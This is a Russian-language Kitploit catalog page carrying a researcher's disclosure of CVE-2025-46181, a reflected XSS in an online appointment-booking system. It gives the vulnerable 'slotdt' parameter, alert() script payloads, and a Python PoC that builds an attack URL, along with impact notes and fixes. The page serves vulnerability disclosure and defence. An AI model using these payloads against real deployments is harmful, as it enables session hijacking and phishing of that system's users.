Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-46181-XSS — Раскрытие уязвимости отражённого XSS с PoC-скриптом и рекомендациями по устранению для системы онлайн-записи на приём. Включает анализ уязвимых параметров и оценку воздействия. | Kitploit
Инструменты/GitHubGitHub/shemkumar/cve-2025-46181-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Раскрытие уязвимости отражённого XSS с PoC-скриптом и рекомендациями по устранению для системы онлайн-записи на приём. Включает анализ уязвимых параметров и оценку воздействия.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-46181 - Отражённый XSS в системе онлайн-записи на приём

CVE-ID: CVE-2025-46181
Обнаружено: Shemkumar P (shemkumar.github.io)
Тип уязвимости: Отражённый межсайтовый скриптинг (XSS)
Серьёзность: Средняя
Статус: Раскрыто, назначен CVE от MITRE


✨ Описание

Отражённая межсайтовая скриптинг (XSS) уязвимость существует в публичной системе онлайн-записи на приём (v1.0), конкретно на странице, обрабатывающей подтверждение записи. GET-параметр не обеспечивает должную санитацию ввода, что позволяет внедрить JavaScript и выполнить код в браузере жертвы.


📍 Уязвимый параметр

root@kitploit:~
GET /confirmapp.php?slotdt=<полезная_нагрузка>

Пример полезной нагрузки (закодированной):

root@kitploit:~
<script>alert("XSS")</script>

💥 Подтверждение концепции (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Прямая ссылка скрыта по этическим соображениям. Уязвимость была протестирована в контролируемой среде.


⚙️ Скрипт PoC на Python

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Воздействие

  • Произвольное выполнение JavaScript
  • Возможный перехват сессии
  • Переадресация на фишинг или кликджекинг
  • Целевые атаки через сфабрикованные ссылки

🧪 Устранение

Приложение должно:

  • Экранировать пользовательский ввод с помощью htmlspecialchars() в PHP
  • Использовать политику безопасности контента (CSP)
  • Санировать данные на стороне клиента и сервера

📜 Хронология

  • Обнаружено: май 2025 г.
  • Назначен CVE от MITRE: июнь 2025 г.
  • Публичный релиз: июнь 2025 г.

🧑‍💻 Автор

Shemkumar P
🕸️ shemkumar.github.io
🔐 Исследователь кибербезопасности | Участник CTF | Составитель отчётов о CVE


⚠️ Данная публикация предназначена только для образовательных и защитных целей. Тестирование или эксплуатация уязвимостей в системах, которыми вы не владеете или на которые не имеете явного разрешения, незаконны и неэтичны.

Скачать инструмент